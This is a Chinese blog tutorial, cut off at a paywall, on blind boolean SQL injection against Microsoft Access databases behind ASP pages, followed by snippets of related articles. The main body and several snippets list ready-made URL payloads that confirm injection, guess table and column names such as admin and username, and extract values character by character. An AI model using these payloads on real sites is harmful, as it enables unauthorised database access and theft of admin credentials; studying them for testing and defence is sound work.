SQL注入之access盲注

最新推荐文章于 2023-03-29 10:26:25 发布
最新推荐文章于 2023-03-29 10:26:25 发布
阅读量1.1k 收藏 4
点赞数
CC 4.0 BY-SA版权
分类专栏: sql注入 web安全 文章标签: access盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kerun1/article/details/103414881
本文详细介绍了在没有回显的情况下进行Access数据库的SQL盲注技巧。包括两种方法:第一种通过order by、exists和mid等函数猜解数据库内容;第二种利用msysobjects系统表判断数据库类型,并进行表名和列名的探测。内容涵盖猜解长度、ASCII码及表的存在性判断等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ACCESS盲注:

一般用于没有回显位,无法直接回显数据库内容。
有两种语句方法:

第一种方法:

http://192.168.1.1/news.asp?id=155 order by 1 回显数据库错误,既不可用回显注入。
http://192.168.1.1/news.asp?id=155 and 1=1 返回正常
http://192.168.1.1/news.asp?id=155 and 1=2 返回错误
http://192.168.1.1/news.asp?id=155 and exists(select * from admin(猜的))返回正常既存在,报错既不存在
http://192.168.1.1/news.asp?id=155 and exists(select username from admin)如果admin存在的话,猜列名,username存在返回正常,不存在报错
http://192.168.1.1/news.asp?id=155 and (select top 1 len(username) from admin)=5猜username字段里面的内容长度为5
http://192.168.1.1/news.asp?id=155 and (select top 1 asc(mid(username,1,1)) from admin)=97获取username内容第一位字符的ascii码为97,以此类推,一直猜到第5位字符。

第二种方法:

http://192.168.1.1/news.asp?id=155 and (select count() from msysobjects)>0判断数据库是否为access,msysobjects为access系统表,在web下无权限访问,报错既表示为access数据库。
http://192.168.1.1/news.asp?id=155 and 0<>(select count() from a

最低0.47元/天 解锁文章

200万优质内容无限畅学
access筛选末位数字为1或5_SQL注入第二章——access,mssql,oracle
weixin_39957835的博客
11-29 453
一、Access注入Access是轻量级数据库,特点是没有库,没有用户,单文件即可存储数据,在SQL注入时必须猜测表名和列名。Access只有联合注入和布尔。1,联合注入http://127.0.0.1/Production/PRODUCT_DETAIL.asp?id=151 order by 1 http://127.0.0.1/Production/PRODUCT_DETAIL.asp?i...
DVWA通过攻略之SQL注入
热门推荐
勿山几已
05-24 1万+
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
Access数据库练习
Reset
08-13 1178
http://192.168.75.128/common.asp?id=7 and(select top 1 len(admin) from admin_user)>5 显示错误 http://192.168.75.128/common.asp?id=7 and(select top 1 ...
Access数据库基于时间的实现[www.freebuf.com]
weixin_33831196的博客
08-30 381
Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了 Microsoft Jet Database Engine 和 图形用户界面两项特点,是 Microsoft Office 的系统程式之一。0×00概述众所周知,access数据库是不支持基于时间的方式,但是我们可以利用access的系统表MSysAccessObjects,通过多...
access 数据库。。。
weixin_34174132的博客
12-20 510
2019独角兽企业重金招聘Python工程师标准>>> ...
ACCESS之获取网站的管理员账户密码
weixin_48170459的博客
12-05 2116
我们将通过一个网站来熟悉ACCESS 靶机: win2003 我们先在网站的各个地方寻找注入点,发现在id的位置存在一个注入点 接着判断是字符型注入还是数值型注入,发现是数值型注入 1.字符型测试:id=2’ and ‘1’='1或id=2" and “1”="1 2.数值型测试:id=2 and 1=1 接着进行错误注入判断 id=2 and 1=0 判断是否为ACCESS数据库 id=2 and exists(select * from sysobjects) id=2 and exists(
超级SQL注入工具,支持布尔,报错,union注入
最新发布
03-27
超级SQL注入工具目前支持Bool型、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
SuperSQLInjectionV1:超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包SQL注入工具,采用C#开发,直接操作TCP会话来进行HTTP交互,支持出现在HTTP协议任意位置SQL注入,支持各种类型SQL注入,支持HTTPS模式注入;支持以、错误显示、Union注入等方式来获取数据;支持AccessMySQLSQLServerOraclePostgreSQLDB2SQLiteInformix等数据库;支持手动灵活的进行SQL注入绕过,可自定义进行字符替换等绕过
05-06
超级SQL注入工具 简介: 超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包SQL注入工具,采用C#开发,程序采用自写代码来操作HTTP交互,支持出现在HTTP协议任意位置SQL注入,支持各种类型SQL注入,支持HTTPS...
超级SQL注入工具使用说明书V201512271
08-08
该工具不仅支持多种类型的SQL注入,如Bool型、错误显示注入和Union注入,而且对多种数据库系统,如Access、MySQL5及以上版本、SQLServer和Oracle等,都具有良好的兼容性。通过使用C#开发并利用Socket发包,...
WEB安全 ACCESS 注入脚本
weixin_30266885的博客
12-08 145
http://www.xxx.cn/cp.asp?classid=3http://www.xxx.cn/cp.asp?classid=3 and //有拦截关键字http://www.xxx.cn/cp.asp?classid=3 AND 1=1 //大写绕过http://www.xxx.cn/cp.asp?classid=3 AND 1=2http://www.xxx.cn/cp.asp?...
sql注入-access数据库-总结
weixin_42109829的博客
12-15 1368
Access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具 手工注入 判断注入点 1.这里采用墨者学院提供的SQL手工注入漏洞测试环境 http://219.153.49.228:40000/new_list.asp?id=1 2.判断注入点标准三连 ’ ~ and 1 ~ and 0 http://219.153.49.228:47744/new_list.asp?id=1' #页面报错 http://219.153.49.228:47744/ne
13-sql注入查询方式及报错
qq_56414082的博客
03-29 708
当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或进行后续操作,同时作为手工注入时,提前了解或预知其SQL语句大概写法也能更好的选择对应的注入语句。Access暴力猜解不出的问题?
Access数据库及注入方法
weixin_50464560的博客
08-02 1118
Access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统。Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软Office家族的一个成员。Access以它自己的格式将数据存储在基于Access Jet的数据库引擎里。Access数据库属于文件型数据库,所以不需要端口号。 在Office 2007之前的Access数据库文件的后缀是 .mdb ,Office2007及其之后的Access
Access注入
zhuangsle的博客
08-25 798
Access数据库注入 一、注入原理 (一)判断数据库类型 1、前提条件 SQL server中存在内置的变量/系统表(数据库服务器基本上都会有); IIS错误提示没有屏蔽掉,并且SQL server可以返回错误提示; 浏览器能够显示相关的错误提示,一般低版本的ie浏览器可以显示相关的错误信息。 2、通过内置变量判断数据库类型 概述 Access数据中存在一些内置变量,例如User,并且其数据类型被规定为nvarchar,我们可以通过构造SQL语句,提交查询让user与整型数据进行比较,不同数据类型
SQL注入-无回显】布尔:原理、函数、利用过程
06-14 8814
SQL注入-无回显】
Access数据库SQL注入小结
HappyOrange2014的专栏
11-10 1万+
Access数据库SQL注入小结这里总结一下学到的Access数据库注入的知识点。
Access数据库注入高级玩法
asli33的专栏
02-21 763
http://ynhu33.blog.51cto.com/412835/259144 Access数据库注入高级玩法,鉴于论坛的朋友要求,在这整理下,以飨读者。Access数据库想对于MsSql来说可谓小巫见大巫,但是Acc的数据库在目前国内还是有一定的市场,其注入也很灵活。相信你看完本文就会了解到Access也是很强大的。 一,基础篇 1、猜解表名,这里借用啊D的语句: and
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值